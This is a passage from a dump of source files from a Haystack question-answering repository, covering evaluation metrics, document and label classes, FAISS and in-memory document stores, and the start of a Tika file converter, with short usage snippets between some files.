predicted_span[\"offset_end\"]) and \\\n (predicted_span[\"offset_start\"] <= gold_span[\"offset_end\"]):\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"correct_readings_top1\"] += 1\n metric_counts[\"correct_readings_top1_has_answer\"] += 1\n # top-k answers\n metric_counts[\"correct_readings_topk\"] += 1\n metric_counts[\"correct_readings_topk_has_answer\"] += 1\n found_answer = True\n\n return metric_counts, found_answer\n\n\ndef _count_exact_match(\n gold_span: Dict[str, Any],\n predicted_span: Dict[str, Any],\n metric_counts: Dict[str, float],\n answer_idx: int\n ):\n # Check if exact match between prediction and real answer.\n # As evaluation needs to be framework independent, we cannot use the farm.evaluation.metrics.py functions.\n\n found_em = False\n\n if (gold_span[\"offset_start\"] == predicted_span[\"offset_start\"]) and \\\n (gold_span[\"offset_end\"] == predicted_span[\"offset_end\"]):\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"exact_matches_top1\"] += 1\n metric_counts[\"exact_matches_top1_has_answer\"] += 1\n # top-k answers\n metric_counts[\"exact_matches_topk\"] += 1\n metric_counts[\"exact_matches_topk_has_answer\"] += 1\n found_em = True\n\n return metric_counts, found_em\n\n\ndef _calculate_f1(gold_span: Dict[str, Any], predicted_span: Dict[str, Any]):\n # Calculates F1-Score for prediction based on real answer using character offsets.\n # As evaluation needs to be framework independent, we cannot use the farm.evaluation.metrics.py functions.\n\n pred_indices = list(range(predicted_span[\"offset_start\"], predicted_span[\"offset_end\"]))\n gold_indices = list(range(gold_span[\"offset_start\"], gold_span[\"offset_end\"]))\n n_overlap = len([x for x in pred_indices if x in gold_indices])\n if pred_indices and gold_indices and n_overlap:\n precision = n_overlap / len(pred_indices)\n recall = n_overlap / len(gold_indices)\n f1 = (2 * precision * recall) / (precision + recall)\n\n return f1\n else:\n return 0\n\n\ndef _count_no_answer(answers: List[dict], metric_counts: Dict[str, float]):\n # Checks if one of the answers is 'no answer'.\n\n for answer_idx, answer in enumerate(answers):\n # check if 'no answer'\n if answer[\"answer\"] is None:\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"correct_no_answers_top1\"] += 1\n metric_counts[\"correct_readings_top1\"] += 1\n metric_counts[\"exact_matches_top1\"] += 1\n metric_counts[\"summed_f1_top1\"] += 1\n # top-k answers\n metric_counts[\"correct_no_answers_topk\"] += 1\n metric_counts[\"correct_readings_topk\"] += 1\n metric_counts[\"exact_matches_topk\"] += 1\n metric_counts[\"summed_f1_topk\"] += 1\n break\n\n return metric_counts"
},
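To make the span metrics above concrete, here is a tiny worked example of the character-offset F1 (`_calculate_f1` is the private helper defined in the module; the offsets are arbitrary):

```python
from haystack.eval import _calculate_f1

gold_span = {"offset_start": 10, "offset_end": 20}       # gold covers chars 10-19
predicted_span = {"offset_start": 15, "offset_end": 25}  # prediction covers 15-24
# Overlap is chars 15-19 (5 chars): precision = 5/10, recall = 5/10, F1 = 0.5
print(_calculate_f1(gold_span, predicted_span))  # 0.5
```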
{
"alpha_fraction": 0.7732240557670593,
"alphanum_fraction": 0.7768670320510864,
"avg_line_length": 60,
"blob_id": "79167e421d15975e142ff140ef35e255701adb1d",
"content_id": "b66668c9cfc6b16ca13167f8a14c65c31032a314",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1098,
"license_type": "permissive",
"max_line_length": 192,
"num_lines": 18,
"path": "/CONTRIBUTING.md",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "# Contributing to Haystack\n\nWe are very open to community contributions and appreciate anything that improves `haystack`! This includes fixings typos, adding missing documentation, fixing bugs or adding new features.\nTo avoid unnecessary work on either side, please stick to the following process:\n\n1. Check if there is already [an related issue](https://github.com/deepset-ai/haystack/issues).\n2. If there is not, open a new one to start a discussion. Some features might be a nice idea, but don't fit in the scope of Haystack and we hate to close finished PRs!\n3. If we came to the conclusion to move forward with your issue, we will be happy to accept a pull request. Make sure you create a pull request in an early draft version and ask for feedback. \n4. Verify that all tests in the CI pass (and add new ones if you implement anything new)\n\n## Formatting of Pull Requests\n\nPlease give a concise description in the first comment in the PR that includes: \n- What is changing?\n- Why? \n- What are limitations?\n- Breaking changes (Example of before vs. after)\n- Link the issue that this relates to\n"
},
{
"alpha_fraction": 0.5586445927619934,
"alphanum_fraction": 0.5592606663703918,
"avg_line_length": 41.71052551269531,
"blob_id": "760c3df7600b3359da8708044861a84cd02d936e",
"content_id": "26bb80a9223c1411664da420c3f6e42a7d54ae1c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12985,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 304,
"path": "/haystack/database/base.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom abc import abstractmethod, ABC\nfrom typing import Any, Optional, Dict, List, Union\nfrom uuid import uuid4\n\nimport numpy as np\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Document:\n def __init__(self, text: str,\n id: str = None,\n query_score: Optional[float] = None,\n question: Optional[str] = None,\n meta: Optional[Dict[str, Any]] = None,\n embedding: Optional[np.array] = None):\n \"\"\"\n Object used to represent documents / passages in a standardized way within Haystack.\n For example, this is what the retriever will return from the DocumentStore,\n regardless if it's ElasticsearchDocumentStore or InMemoryDocumentStore.\n\n Note that there can be multiple Documents originating from one file (e.g. PDF),\n if you split the text into smaller passages. We'll have one Document per passage in this case.\n\n :param id: ID used within the DocumentStore\n :param text: Text of the document\n :param query_score: Retriever's query score for a retrieved document\n :param question: Question text for FAQs.\n :param meta: Meta fields for a document like name, url, or author.\n :param embedding: Vector encoding of the text\n \"\"\"\n\n self.text = text\n # Create a unique ID (either new one, or one from user input)\n if id:\n self.id = str(id)\n else:\n self.id = str(uuid4())\n\n self.query_score = query_score\n self.question = question\n self.meta = meta\n self.embedding = embedding\n\n def to_dict(self, field_map={}):\n inv_field_map = {v:k for k, v in field_map.items()}\n _doc: Dict[str, str] = {}\n for k, v in self.__dict__.items():\n k = k if k not in inv_field_map else inv_field_map[k]\n _doc[k] = v\n return _doc\n\n @classmethod\n def from_dict(cls, dict, field_map={}):\n _doc = dict.copy()\n init_args = [\"text\", \"id\", \"query_score\", \"question\", \"meta\", \"embedding\"]\n if \"meta\" not in _doc.keys():\n _doc[\"meta\"] = {}\n # copy additional fields into \"meta\"\n for k, v in _doc.items():\n if k not in init_args and k not in field_map:\n _doc[\"meta\"][k] = v\n # remove additional fields from top level\n _new_doc = {}\n for k, v in _doc.items():\n if k in init_args:\n _new_doc[k] = v\n elif k in field_map:\n k = field_map[k]\n _new_doc[k] = v\n\n return cls(**_new_doc)\n\n\nclass Label:\n def __init__(self, question: str,\n answer: str,\n is_correct_answer: bool,\n is_correct_document: bool,\n origin: str,\n document_id: Optional[str] = None,\n offset_start_in_doc: Optional[int] = None,\n no_answer: Optional[bool] = None,\n model_id: Optional[int] = None):\n \"\"\"\n Object used to represent label/feedback in a standardized way within Haystack.\n This includes labels from dataset like SQuAD, annotations from labeling tools,\n or, user-feedback from the Haystack REST API.\n\n :param question: the question(or query) for finding answers.\n :param answer: the answer string.\n :param is_correct_answer: whether the sample is positive or negative.\n :param is_correct_document: in case of negative sample(is_correct_answer is False), there could be two cases;\n incorrect answer but correct document & incorrect document. This flag denotes if\n the returned document was correct.\n :param origin: the source for the labels. 
It can be used later for filtering.\n        :param document_id: the document_store's ID for the returned answer document.\n        :param offset_start_in_doc: the answer start offset in the document.\n        :param no_answer: whether the question is unanswerable.\n        :param model_id: model_id used for prediction (in case of user feedback).\n        \"\"\"\n        self.question = question\n        self.answer = answer\n        self.is_correct_answer = is_correct_answer\n        self.is_correct_document = is_correct_document\n        self.origin = origin\n        self.document_id = document_id\n        self.offset_start_in_doc = offset_start_in_doc\n        self.no_answer = no_answer\n        self.model_id = model_id\n\n    @classmethod\n    def from_dict(cls, dict):\n        return cls(**dict)\n\n    def to_dict(self):\n        return self.__dict__\n\n    # define __eq__ and __hash__ functions to deduplicate Label Objects\n    def __eq__(self, other):\n        return (isinstance(other, self.__class__) and\n                getattr(other, 'question', None) == self.question and\n                getattr(other, 'answer', None) == self.answer and\n                getattr(other, 'is_correct_answer', None) == self.is_correct_answer and\n                getattr(other, 'is_correct_document', None) == self.is_correct_document and\n                getattr(other, 'origin', None) == self.origin and\n                getattr(other, 'document_id', None) == self.document_id and\n                getattr(other, 'offset_start_in_doc', None) == self.offset_start_in_doc and\n                getattr(other, 'no_answer', None) == self.no_answer and\n                getattr(other, 'model_id', None) == self.model_id)\n\n    def __hash__(self):\n        return hash(self.question +\n                    self.answer +\n                    str(self.is_correct_answer) +\n                    str(self.is_correct_document) +\n                    str(self.origin) +\n                    str(self.document_id) +\n                    str(self.offset_start_in_doc) +\n                    str(self.no_answer) +\n                    str(self.model_id))\n\n\nclass MultiLabel:\n    def __init__(self, question: str,\n                 multiple_answers: List[str],\n                 is_correct_answer: bool,\n                 is_correct_document: bool,\n                 origin: str,\n                 multiple_document_ids: List[Any],\n                 multiple_offset_start_in_docs: List[Any],\n                 no_answer: Optional[bool] = None,\n                 model_id: Optional[int] = None):\n        \"\"\"\n        Object used to aggregate multiple possible answers for the same question\n\n        :param question: the question(or query) for finding answers.\n        :param multiple_answers: list of possible answer strings\n        :param is_correct_answer: whether the sample is positive or negative.\n        :param is_correct_document: in case of negative sample(is_correct_answer is False), there could be two cases;\n                                    incorrect answer but correct document & incorrect document. This flag denotes if\n                                    the returned document was correct.\n        :param origin: the source for the labels. It can be used later for filtering.\n        :param multiple_document_ids: the document_store's IDs for the returned answer documents.\n        :param multiple_offset_start_in_docs: the answer start offsets in the document.\n        :param no_answer: whether the question is unanswerable.\n        :param model_id: model_id used for prediction (in case of user feedback).\n        \"\"\"\n        self.question = question\n        self.multiple_answers = multiple_answers\n        self.is_correct_answer = is_correct_answer\n        self.is_correct_document = is_correct_document\n        self.origin = origin\n        self.multiple_document_ids = multiple_document_ids\n        self.multiple_offset_start_in_docs = multiple_offset_start_in_docs\n        self.no_answer = no_answer\n        self.model_id = model_id\n\n    @classmethod\n    def from_dict(cls, dict):\n        return cls(**dict)\n\n    def to_dict(self):\n        return self.__dict__\n\n\nclass BaseDocumentStore(ABC):\n    \"\"\"\n    Base class for implementing Document Stores.\n    \"\"\"\n    index: Optional[str]\n    label_index: Optional[str]\n\n    @abstractmethod\n    def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n        \"\"\"\n        Indexes documents for later queries.\n\n        :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n                          For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n                          Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n                          \"meta\":{\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n                          It can be used for filtering and is accessible in the responses of the Finder.\n        :param index: Optional name of index where the documents shall be written to.\n                      If None, the DocumentStore's default index (self.index) will be used.\n\n        :return: None\n        \"\"\"\n        pass\n\n    @abstractmethod\n    def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n        pass\n\n    @abstractmethod\n    def get_all_labels(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n        pass\n\n    def get_all_labels_aggregated(self,\n                                  index: Optional[str] = None,\n                                  filters: Optional[Dict[str, List[str]]] = None) -> List[MultiLabel]:\n        aggregated_labels = []\n        all_labels = self.get_all_labels(index=index, filters=filters)\n\n        # Collect all answers to a question in a dict\n        question_ans_dict = {}  # type: ignore\n        for l in all_labels:\n            # only aggregate labels with correct answers, as only those can be currently used in evaluation\n            if not l.is_correct_answer:\n                continue\n\n            if l.question in question_ans_dict:\n                question_ans_dict[l.question].append(l)\n            else:\n                question_ans_dict[l.question] = [l]\n\n        # Aggregate labels\n        for q, ls in question_ans_dict.items():\n            ls = list(set(ls))  # get rid of exact duplicates\n            # check if there are both text answer and \"no answer\" present\n            t_present = False\n            no_present = False\n            no_idx = []\n            for idx, l in enumerate(ls):\n                if len(l.answer) == 0:\n                    no_present = True\n                    no_idx.append(idx)\n                else:\n                    t_present = True\n            # if both text and no answer are present, remove no answer labels\n            if t_present and no_present:\n                logger.warning(\n                    f\"Both text label and 'no answer possible' label are present for question: {ls[0].question}\")\n                for remove_idx in no_idx[::-1]:\n                    ls.pop(remove_idx)\n\n            # construct Aggregated_label\n            for i, l in enumerate(ls):\n                if i == 0:\n                    agg_label = MultiLabel(question=l.question,\n                                           multiple_answers=[l.answer],\n                                           is_correct_answer=l.is_correct_answer,\n                                           is_correct_document=l.is_correct_document,\n                                           origin=l.origin,\n
multiple_document_ids=[l.document_id],\n multiple_offset_start_in_docs=[l.offset_start_in_doc],\n no_answer=l.no_answer,\n model_id=l.model_id,\n )\n else:\n agg_label.multiple_answers.append(l.answer)\n agg_label.multiple_document_ids.append(l.document_id)\n agg_label.multiple_offset_start_in_docs.append(l.offset_start_in_doc)\n aggregated_labels.append(agg_label)\n return aggregated_labels\n\n @abstractmethod\n def get_document_by_id(self, id: str, index: Optional[str] = None) -> Optional[Document]:\n pass\n\n @abstractmethod\n def get_document_count(self, index: Optional[str] = None) -> int:\n pass\n\n @abstractmethod\n def query_by_embedding(self,\n query_emb: List[float],\n filters: Optional[Optional[Dict[str, List[str]]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n pass\n\n @abstractmethod\n def get_label_count(self, index: Optional[str] = None) -> int:\n pass\n\n @abstractmethod\n def add_eval_data(self, filename: str, doc_index: str = \"document\", label_index: str = \"label\"):\n pass\n\n def delete_all_documents(self, index: str):\n pass\n\n"
},
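A quick sketch of the `Document` dict round-trip defined above; the "author" and "custom_text" names are invented for illustration:

```python
from haystack.database.base import Document

doc = Document.from_dict({"text": "Hello world", "author": "somebody"})
assert doc.meta["author"] == "somebody"   # unknown keys are folded into meta
d = doc.to_dict(field_map={"custom_text": "text"})
assert d["custom_text"] == "Hello world"  # field_map renames keys on the way out
```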
{
"alpha_fraction": 0.6253019571304321,
"alphanum_fraction": 0.630514919757843,
"avg_line_length": 41.739131927490234,
"blob_id": "4bf811778d71f8f841d51108b094e8b3243d766a",
"content_id": "2376b4484c34112ea55cea13382e7095874e71db",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7865,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 184,
"path": "/haystack/database/faiss.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom pathlib import Path\nfrom typing import Union, List, Optional\n\nimport faiss\nimport numpy as np\nfrom faiss.swigfaiss import IndexHNSWFlat\n\nfrom haystack.database.base import Document\nfrom haystack.database.sql import SQLDocumentStore\nfrom haystack.retriever.base import BaseRetriever\n\nlogger = logging.getLogger(__name__)\n\n\nclass FAISSDocumentStore(SQLDocumentStore):\n \"\"\"\n Document store for very large scale embedding based dense retrievers like the DPR.\n\n It implements the FAISS library(https://github.com/facebookresearch/faiss)\n to perform similarity search on vectors.\n\n The document text and meta-data(for filtering) is stored using the SQLDocumentStore, while\n the vector embeddings are indexed in a FAISS Index.\n\n \"\"\"\n\n def __init__(\n self,\n sql_url: str = \"sqlite:///\",\n index_buffer_size: int = 10_000,\n vector_size: int = 768,\n faiss_index: Optional[IndexHNSWFlat] = None,\n ):\n \"\"\"\n :param sql_url: SQL connection URL for database. It defaults to local file based SQLite DB. For large scale\n deployment, Postgres is recommended.\n :param index_buffer_size: When working with large dataset, the indexing process(FAISS + SQL) can be buffered in\n smaller chunks to reduce memory footprint.\n :param vector_size: the embedding vector size.\n :param faiss_index: load an existing FAISS Index.\n \"\"\"\n self.vector_size = vector_size\n self.faiss_index = faiss_index\n self.index_buffer_size = index_buffer_size\n super().__init__(url=sql_url)\n\n def _create_new_index(self, vector_size: int, index_factory: str = \"HNSW4\"):\n index = faiss.index_factory(vector_size + 1, index_factory)\n return index\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n if self.faiss_index is not None:\n raise Exception(\"Addition of more data in an existing index is not supported.\")\n\n faiss_index = self._create_new_index(vector_size=self.vector_size)\n index = index or self.index\n document_objects = [Document.from_dict(d) if isinstance(d, dict) else d for d in documents]\n\n add_vectors = False if document_objects[0].embedding is None else True\n\n if add_vectors:\n phi = self._get_phi(document_objects)\n\n for i in range(0, len(document_objects), self.index_buffer_size):\n if add_vectors:\n embeddings = [doc.embedding for doc in document_objects[i: i + self.index_buffer_size]]\n hnsw_vectors = self._get_hnsw_vectors(embeddings=embeddings, phi=phi)\n faiss_index.add(hnsw_vectors)\n\n docs_to_write_in_sql = []\n for vector_id, doc in enumerate(document_objects[i : i + self.index_buffer_size]):\n meta = doc.meta\n if add_vectors:\n meta[\"vector_id\"] = vector_id\n docs_to_write_in_sql.append(doc)\n\n super(FAISSDocumentStore, self).write_documents(docs_to_write_in_sql, index=index)\n self.faiss_index = faiss_index\n\n def _get_hnsw_vectors(self, embeddings: List[np.array], phi: int) -> np.array:\n \"\"\"\n HNSW indices in FAISS only support L2 distance. 
This transformation adds an additional dimension to obtain\n corresponding inner products.\n\n You can read ore details here:\n https://github.com/facebookresearch/faiss/wiki/MetricType-and-distances#how-can-i-do-max-inner-product-search-on-indexes-that-support-only-l2\n \"\"\"\n vectors = [np.reshape(emb, (1, -1)) for emb in embeddings]\n norms = [(doc_vector ** 2).sum() for doc_vector in vectors]\n aux_dims = [np.sqrt(phi - norm) for norm in norms]\n hnsw_vectors = [np.hstack((doc_vector, aux_dims[i].reshape(-1, 1))) for i, doc_vector in enumerate(vectors)]\n hnsw_vectors = np.concatenate(hnsw_vectors, axis=0)\n return hnsw_vectors\n\n def _get_phi(self, documents: List[Document]) -> int:\n phi = 0\n for doc in documents:\n norms = (doc.embedding ** 2).sum() # type: ignore\n phi = max(phi, norms)\n return phi\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. after changing the retriever config).\n\n :param retriever: Retriever to use to get embeddings for text\n :param index: Index name to update\n :return: None\n \"\"\"\n # Some FAISS indexes(like the default HNSWx) do not support removing vectors, so a new index is created.\n faiss_index = self._create_new_index(vector_size=self.vector_size)\n index = index or self.index\n\n documents = self.get_all_documents(index=index)\n logger.info(f\"Updating embeddings for {len(documents)} docs ...\")\n embeddings = retriever.embed_passages(documents) # type: ignore\n assert len(documents) == len(embeddings)\n for i, doc in enumerate(documents):\n doc.embedding = embeddings[i]\n\n phi = self._get_phi(documents)\n\n for i in range(0, len(documents), self.index_buffer_size):\n embeddings = [doc.embedding for doc in documents[i : i + self.index_buffer_size]]\n hnsw_vectors = self._get_hnsw_vectors(embeddings=embeddings, phi=phi)\n faiss_index.add(hnsw_vectors)\n\n doc_meta_to_update = []\n for vector_id, doc in enumerate(documents[i : i + self.index_buffer_size]):\n meta = doc.meta or {}\n meta[\"vector_id\"] = vector_id\n doc_meta_to_update.append((doc.id, meta))\n\n for doc_id, meta in doc_meta_to_update:\n super(FAISSDocumentStore, self).update_document_meta(id=doc_id, meta=meta)\n\n self.faiss_index = faiss_index\n\n def query_by_embedding(\n self, query_emb: np.array, filters: Optional[dict] = None, top_k: int = 10, index: Optional[str] = None\n ) -> List[Document]:\n if filters:\n raise Exception(\"Query filters are not implemented for the FAISSDocumentStore.\")\n if not self.faiss_index:\n raise Exception(\"No index exists. 
Use 'update_embeddings()` to create an index.\")\n query_emb = query_emb.reshape(1, -1)\n\n aux_dim = np.zeros(len(query_emb), dtype=\"float32\")\n hnsw_vectors = np.hstack((query_emb, aux_dim.reshape(-1, 1)))\n _, vector_id_matrix = self.faiss_index.search(hnsw_vectors, top_k)\n vector_ids_for_query = [str(vector_id) for vector_id in vector_id_matrix[0] if vector_id != -1]\n\n documents = self.get_all_documents(filters={\"vector_id\": vector_ids_for_query}, index=index)\n # sort the documents as per query results\n documents = sorted(documents, key=lambda doc: vector_ids_for_query.index(doc.meta[\"vector_id\"])) # type: ignore\n\n return documents\n\n def save(self, file_path: Union[str, Path]):\n \"\"\"\n Save FAISS Index to the specified file.\n \"\"\"\n faiss.write_index(self.faiss_index, str(file_path))\n\n @classmethod\n def load(\n cls,\n faiss_file_path: Union[str, Path],\n sql_url: str,\n index_buffer_size: int = 10_000,\n vector_size: int = 768\n ):\n \"\"\"\n Load a saved FAISS index from a file and connect to the SQL database.\n \"\"\"\n faiss_index = faiss.read_index(str(faiss_file_path))\n return cls(\n faiss_index=faiss_index,\n sql_url=sql_url,\n index_buffer_size=index_buffer_size,\n vector_size=vector_size\n )\n\n"
},
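The `_get_hnsw_vectors` trick above converts maximum inner-product search into an L2 search by appending one auxiliary dimension. A small numeric check of that identity (all values arbitrary):

```python
import numpy as np

docs = np.array([[1.0, 2.0], [3.0, 1.0]])
phi = max((d ** 2).sum() for d in docs)           # max squared norm, as in _get_phi()
aux = np.sqrt(phi - (docs ** 2).sum(axis=1))
docs_aug = np.hstack([docs, aux.reshape(-1, 1)])  # every doc now has norm sqrt(phi)

query = np.array([2.0, 1.0])
query_aug = np.append(query, 0.0)                 # queries get a zero, as in query_by_embedding()
# ||q_aug - d_aug||^2 = ||q||^2 + phi - 2 * <q, d>, so smallest L2 == largest inner product
l2 = ((docs_aug - query_aug) ** 2).sum(axis=1)
assert np.argmin(l2) == np.argmax(docs @ query)
```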
{
"alpha_fraction": 0.5888614058494568,
"alphanum_fraction": 0.5904703140258789,
"avg_line_length": 39.808082580566406,
"blob_id": "4601df4309afeed5170418fade0578c71a6eb568",
"content_id": "a658b667462cc46b49168b7bf0bb82d10cbf825e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8080,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 198,
"path": "/haystack/database/memory.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import Any, Dict, List, Optional, Union\nfrom uuid import uuid4\nfrom collections import defaultdict\n\nfrom haystack.database.base import BaseDocumentStore, Document, Label\nfrom haystack.indexing.utils import eval_data_from_file\nfrom haystack.retriever.base import BaseRetriever\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass InMemoryDocumentStore(BaseDocumentStore):\n \"\"\"\n In-memory document store\n \"\"\"\n\n def __init__(self, embedding_field: Optional[str] = None):\n self.indexes: Dict[str, Dict] = defaultdict(dict)\n self.index: str = \"document\"\n self.label_index: str = \"label\"\n self.embedding_field: str = \"embedding\"\n self.embedding_dim : int = 768\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n \"\"\"\n Indexes documents for later queries.\n\n\n :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n \"meta\": {\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n It can be used for filtering and is accessible in the responses of the Finder.\n :param index: write documents to a custom namespace. For instance, documents for evaluation can be indexed in a\n separate index than the documents for search.\n :return: None\n \"\"\"\n index = index or self.index\n\n documents_objects = [Document.from_dict(d) if isinstance(d, dict) else d for d in documents]\n\n for document in documents_objects:\n self.indexes[index][document.id] = document\n\n def write_labels(self, labels: Union[List[dict], List[Label]], index: Optional[str] = None):\n index = index or self.label_index\n label_objects = [Label.from_dict(l) if isinstance(l, dict) else l for l in labels]\n\n for label in label_objects:\n label_id = str(uuid4())\n self.indexes[index][label_id] = label\n\n def get_document_by_id(self, id: str, index: Optional[str] = None) -> Optional[Document]:\n index = index or self.index\n documents = self.get_documents_by_id([id], index=index)\n if documents:\n return documents[0]\n else:\n return None\n\n def get_documents_by_id(self, ids: List[str], index: Optional[str] = None) -> List[Document]:\n index = index or self.index\n documents = [self.indexes[index][id] for id in ids]\n return documents\n\n def query_by_embedding(self,\n query_emb: List[float],\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n\n from numpy import dot\n from numpy.linalg import norm\n\n if filters:\n raise NotImplementedError(\"Setting `filters` is currently not supported in \"\n \"InMemoryDocumentStore.query_by_embedding(). Please remove filters or \"\n \"use a different DocumentStore (e.g. 
ElasticsearchDocumentStore).\")\n\n index = index or self.index\n\n if query_emb is None:\n return []\n\n candidate_docs = []\n for idx, doc in self.indexes[index].items():\n doc.query_score = dot(query_emb, doc.embedding) / (\n norm(query_emb) * norm(doc.embedding)\n )\n candidate_docs.append(doc)\n\n return sorted(candidate_docs, key=lambda x: x.query_score, reverse=True)[0:top_k]\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. after changing the retriever config).\n\n :param retriever: Retriever\n :param index: Index name to update\n :return: None\n \"\"\"\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Specify the arg embedding_field when initializing InMemoryDocumentStore()\")\n\n # TODO Index embeddings every X batches to avoid OOM for huge document collections\n docs = self.get_all_documents(index)\n logger.info(f\"Updating embeddings for {len(docs)} docs ...\")\n embeddings = retriever.embed_passages(docs) # type: ignore\n assert len(docs) == len(embeddings)\n\n if embeddings[0].shape[0] != self.embedding_dim:\n raise RuntimeError(f\"Embedding dim. of model ({embeddings[0].shape[0]})\"\n f\" doesn't match embedding dim. in documentstore ({self.embedding_dim}).\"\n \"Specify the arg `embedding_dim` when initializing InMemoryDocumentStore()\")\n\n for doc, emb in zip(docs, embeddings):\n self.indexes[index][doc.id].embedding = emb\n\n def get_document_count(self, index: Optional[str] = None) -> int:\n index = index or self.index\n return len(self.indexes[index].items())\n\n def get_label_count(self, index: Optional[str] = None) -> int:\n index = index or self.label_index\n return len(self.indexes[index].items())\n\n def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n index = index or self.index\n documents = list(self.indexes[index].values())\n filtered_documents = []\n\n if filters:\n for doc in documents:\n is_hit = True\n for key, values in filters.items():\n if doc.meta.get(key):\n if doc.meta[key] not in values:\n is_hit = False\n else:\n is_hit = False\n if is_hit:\n filtered_documents.append(doc)\n else:\n filtered_documents = documents\n\n return filtered_documents\n\n def get_all_labels(self, index: str = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n index = index or self.label_index\n\n if filters:\n result = []\n for label in self.indexes[index].values():\n label_dict = label.to_dict()\n is_hit = True\n for key, values in filters.items():\n if label_dict[key] not in values:\n is_hit = False\n break\n if is_hit:\n result.append(label)\n else:\n result = list(self.indexes[index].values())\n\n return result\n\n def add_eval_data(self, filename: str, doc_index: Optional[str] = None, label_index: Optional[str] = None):\n \"\"\"\n Adds a SQuAD-formatted file to the DocumentStore in order to be able to perform evaluation on it.\n\n :param filename: Name of the file containing evaluation data\n :type filename: str\n :param doc_index: Elasticsearch index where evaluation documents should be stored\n :type doc_index: str\n :param label_index: Elasticsearch index where labeled questions should be stored\n :type label_index: str\n \"\"\"\n\n docs, labels = eval_data_from_file(filename)\n doc_index = 
doc_index or self.index\n label_index = label_index or self.label_index\n self.write_documents(docs, index=doc_index)\n self.write_labels(labels, index=label_index)\n\n def delete_all_documents(self, index: Optional[str] = None):\n \"\"\"\n Delete all documents in a index.\n\n :param index: index name\n :return: None\n \"\"\"\n\n index = index or self.index\n self.indexes[index] = {}\n"
},
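A minimal usage sketch of the `InMemoryDocumentStore` above (the sample document and file name are invented):

```python
from haystack.database.memory import InMemoryDocumentStore

store = InMemoryDocumentStore()
store.write_documents([{"text": "Berlin is the capital of Germany.",
                        "meta": {"name": "capitals.txt"}}])
print(store.get_document_count())  # 1
docs = store.get_all_documents(filters={"name": ["capitals.txt"]})
print(docs[0].text)
```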
{
"alpha_fraction": 0.5748187303543091,
"alphanum_fraction": 0.5817402601242065,
"avg_line_length": 43.94814682006836,
"blob_id": "b2f8e12cecbb6a55e0382ac7f23fd7de8b70a983",
"content_id": "d464da255abe1fe3b7cfcfbc984e86485b6e3655",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6068,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 135,
"path": "/haystack/indexing/file_converters/tika.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\nfrom html.parser import HTMLParser\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple, Dict, Any\n\nimport requests\nfrom tika import parser as tikaparser\n\nfrom haystack.indexing.file_converters.base import BaseConverter\n\nlogger = logging.getLogger(__name__)\n\n\n# Use the built-in HTML parser with minimum dependencies\nclass TikaXHTMLParser(HTMLParser):\n def __init__(self):\n self.ingest = True\n self.page = \"\"\n self.pages: List[str] = []\n super(TikaXHTMLParser, self).__init__()\n\n def handle_starttag(self, tag, attrs):\n # find page div\n pagediv = [value for attr, value in attrs if attr == \"class\" and value == \"page\"]\n if tag == \"div\" and pagediv:\n self.ingest = True\n\n def handle_endtag(self, tag):\n # close page div, or a single page without page div, save page and open a new page\n if (tag == \"div\" or tag == \"body\") and self.ingest:\n self.ingest = False\n # restore words hyphened to the next line\n self.pages.append(self.page.replace(\"-\\n\", \"\"))\n self.page = \"\"\n\n def handle_data(self, data):\n if self.ingest:\n self.page += data\n\n\nclass TikaConverter(BaseConverter):\n def __init__(\n self,\n tika_url: str = \"http://localhost:9998/tika\",\n remove_numeric_tables: Optional[bool] = False,\n remove_whitespace: Optional[bool] = None,\n 